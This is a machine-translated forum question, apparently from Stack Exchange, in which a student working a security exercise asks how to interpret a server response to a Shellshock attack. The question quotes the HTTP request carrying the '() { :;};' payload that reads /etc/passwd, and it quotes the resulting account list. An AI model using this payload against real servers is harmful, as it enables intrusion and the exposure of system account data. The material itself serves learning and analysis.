Я работаю над вопросом, который включает кого-то, использующего уязвимость на сервере Linux, чтобы получить к нему доступ. Первая часть государств вопросПонимание ответа HTTP от Linux Server
В контроля сетевой активности между критическим Goldmine веб-сервер Tech и ненадежной внешней IP, Боб обнаруживает следующий HTTP GET запрос от ненадежного IP:
GET /cgi-bin/status/status.cgi HTTP/1.1
Host: motherlode.goldminetech.edu
User-Agent:() { :;}; echo "PWNED by 0c007: “ $(</etc/passwd)
I понимаем, что при запуске команды $(</etc/passwd) используется сценарий оболочки, предоставляющий хакеру доступ к этой папке паролей. Затем здесь указан ответ HTTP:
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh
jdoe:*:202:1:John Doe:/home/jdoe:/usr/bin/ksh
Я должен определить, к чему получил доступ хакер. Вот где я застрял, так как я не могу расшифровать этот ответ. Я просмотрел и не могу найти ничего объясняющего, как читать HTTP-ответ с сервера Linux. Любая помощь будет принята с благодарностью.
Это выглядит намного лучше, чем security.stackexchange.com или serverfault.stackexchange.com. – dave
Спасибо, отправлено в безопасности. – Josh
дубликат: http://security.stackexchange.com/q/102155/83701 –